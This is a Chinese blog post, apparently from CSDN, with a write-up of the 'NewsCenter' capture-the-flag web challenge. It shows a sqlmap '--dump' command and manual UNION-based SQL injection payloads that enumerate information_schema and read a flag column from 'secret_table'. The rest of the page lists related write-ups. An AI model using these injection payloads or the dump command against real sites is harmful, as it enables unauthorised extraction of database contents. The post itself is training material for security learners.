攻防世界之NewsCenter

最新推荐文章于 2024-05-18 20:54:16 发布
最新推荐文章于 2024-05-18 20:54:16 发布
阅读量258 收藏
点赞数
分类专栏: wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44111753/article/details/109735091
版权

题目
在这里插入图片描述
WP
在searchnew中随意输入字符串,burpsuite抓包
在这里插入图片描述
发现输入的字符串以post形式提交给了search参数
将http请求打包,用sqlmap探测search参数是否存在sql注入风险
在这里插入图片描述
注入成功
接下来直接将后台数据库直接输出

sqlmap -r searech -p search --dump

在这里插入图片描述
找到flag啦~
手动注入:
发现哪一列可以回显
在这里插入图片描述
打印数据库的表

search=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

在这里插入图片描述
查看secret_table

0' union select 1,group_concat(column_name separator ';'),3 from information_schema.columns where table_name='secret_table' --+

在这里插入图片描述

发现fl4g,查询fl4g

search=0' union select 1,group_concat(fl4g separator ';'),3 from secret_table --+

在这里插入图片描述

行于其野
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 WEB NewsCenter
ChaoYue_miku的博客
01-08 252
攻防世界 WEB NewsCenter NewsCenter:   题目只有一个搜索框,下面显示搜索结果,最先考虑的就是sql注入,先简单构造' or '1=1,果然返回了所有新闻(7条)查看网页源码,发现这里是post方式,可以考虑使用sqlmap。   但是如此形式的sql漏洞应该还有别的方法,毕竟这一看就没有任何过滤验证,也没有提前预编译,是最基础的sql漏洞了,在这里尝试手工构造语句,看看能不能获得什么信息。   通常的方法就是单引号、1、2等尝试,然...
攻防世界web进阶news center
gongjingege的博客
07-11 360
burp suite抓包,sqlmap注入 打开链接 有一个搜索框,随意输入写数字,没有变化,用bp抓包试一下,也没有发现,看了看大佬的wp,才知道考sql注入。。。。 看了下是post,所以然后保存在桌面,123.txt 然后用sqlmap注入(这方面我也不太会。。。) 1,查找数据库 -r C:\Users\123\Desktop\123.txt --dbs 发现有两个数据库 推测应该是news 2,查找news下的表 -r C:\Users\123\Desktop\123.txt --
删除驱动人生后台服务的方法
08-20
卸载驱动人生后,本地服务里会残留驱动人生的后台服务无法删除,占用系统资源。并且启动项软件无法查出这种后台服务。
攻防世界----NewsCenter(字符型SQL注入,union联合查询)
m0_70182904的博客
05-22 1813
在使用union之前需要明确:union前面查询语句查询的元素与后面查询语句查询的元素要数量上要一样,这一点可以使用order by实现(原理:order by根据前面查询内容的属性对查询数据进行分类,order by 后面的内容可以少于前面查询的属性数,但是不能多于查询的属性数)搜索框输入hello,出现与之相关的新闻内容,输入hello'之后发现网页报错,提示我们可能存在字符型SQL注入,再次输入单引号 ',发现网页再次报错,输入hello'#没有报错提示。得到表名news、secret_table。
攻防世界---web---NewsCenter
最新发布
2201_75556700的博客
05-18 378
5、查询列数,查3列的时候,没有报错,再查4列的时候,报错了,所以有三列。6、使用联合查询查数据库名,数据库名为news。4、接着判断注入类型,说明存在字符型注入。8、查secret_table中的字段名。2、打开链接,类似于一个搜索新闻的界面。3、因为有文本框,所以尝试注入。试着搜索第一条新闻hello。9、查fl4g字段中的值。
攻防世界-web-newscenter
wuh2333的博客
05-30 1079
攻防世界,sql注入
攻防世界NewsCenter
qq_45955869的博客
05-19 530
提示:攻防世界新手模式难度2NewsCenter提示:以下是本篇文章正文内容,下面案例可供参考比较基础,比较简单。
攻防世界 web进阶区 NewsCenter
m0_51395584的博客
06-17 826
攻防世界 web进阶区 NewsCenter 简单的SQL联合查询注入
newscenter_app
02-20
新闻中心单击以获取实时版本背景和概述新闻中心现场直播了当今主流媒体如何报道当前的主题。 一次查看CNN,Fox News,NBC,NYTimes和Huffington Post主页上的精选文章。 这个使用React构建的应用程序充当前端,并与...
NewsCenter
06-23
【新闻中心】是一个基于ASP和SQL技术开发的新闻管理系统,具备基本的新闻发布、管理功能。这个系统采用三层架构设计,确保了代码的可维护性、扩展性和模块化。以下是该系统的详细知识点: **1....
PyPI 官网下载 | newscenter-2.0.4.tar.gz
01-14
在Python的世界里,PyPI(Python Package Index)是最重要的资源库,它为全球的开发者提供了一个集中地,可以发布、分享并下载Python模块、库和其他可重用代码。"newscenter-2.0.4.tar.gz"这个压缩包正是PyPI上一个...
驱动人生企业版无广告
11-01
驱动人生企业版,绝无广告,也留着自己以后装机使用,方便快捷,实用。
Python库 | newscenter-1.6.3.tar.gz
05-19
资源分类:Python库 所属语言:Python 资源全名:newscenter-1.6.3.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
Python库 | newscenter-2.0.23.tar.gz
04-12
资源分类:Python库 所属语言:Python 资源全名:newscenter-2.0.23.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
电脑右下角自动弹出窗口(弹窗)
enthan809882的博客
02-19 4430
场景 电脑右下角自动弹出窗口,有时是游戏,有时是广告。 每次都手动点关闭特别麻烦,有的弹窗甚至没法点关闭。 基本是中病毒了。 解决方案 任务管理器查看有没有异常的进程。发现有个叫cnewscenter.exe的程序没见过,关闭这个进程看弹窗关闭吗? 果然关闭了,所以确定就是这个进程。 这就ok了吗? 没有这么简单的,因为肯定有程序启动启动这个程序。果然不久又弹出这个窗口了。 在任务管理器里面,右键属性,查看路径是 D:\Program Files\DTLSoft\DriveTheLife\DTLPlugs\
雷神笔记本关闭跳出垃圾游戏广告
weixin_44217936的博客
07-16 1450
当跳出垃圾广告的时候,不要急着将他关掉,在任务管理器进程当中找到他,名字为cnewscenter.exe,并定位所在文件夹的位置,再打开服务,找到了LThunderobotSvc,就是雷神驱动管理的服务。右键停止服务。然后在雷神驱动文件夹里找到uninstall卸载。就不会有弹窗广告了。 ...
攻防世界-NewsCenter
weixin_39579781的博客
05-06 1179
题目打开是有个输入框可以用来输入搜索信息,初步判断是个sql注入的题目。接下来判断能否进行sql注入:输入 hi,有搜索结果,如下图:输入hi’,无结果,如下图:初步判定是hi‘后面还有单引号,导致重复输入导致的,(单引号与服务端代码中的’形成闭合,将我们输入的字符串hello包裹,服务端代码后面多出来一个‘导致语法错误,而加入#将后面的’注释掉之后不会报错,可确定为字符型SQL注入。
攻防世界web进阶区NewsCenter详解
hxhxhxhxx的博客
07-16 2426
攻防世界web进阶区NewsCenter详解题目方法一sqlmap注入方法二手工注入 题目 我们输入搜索,很明显是一个注入 方法一sqlmap注入 抓到包之后,存到txt文件中, -r获取文件 然后发现可以注入 接着我们–dump直接获取到flag(比较暴力) 方法二手工注入 前引号为了闭合之前的语句,后面的#为了注释后面的引号 否则都会报错 我们使用orderby 查询有几列 当我们写三时发现可以正常查询,4就不行了 发现有一些前缀的文章,那么我们使用一些垃圾话将他查询失效 2和
攻防世界 newscenter
09-08
攻防世界NewsCenter是一个基于React构建的前端应用程序,它提供了实时版本的背景和概述,展示了当前主流媒体如何报道当下的主题。你可以通过查看CNN、Fox News、NBC、NYTimes和Huffington Post主页上的精选文章来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值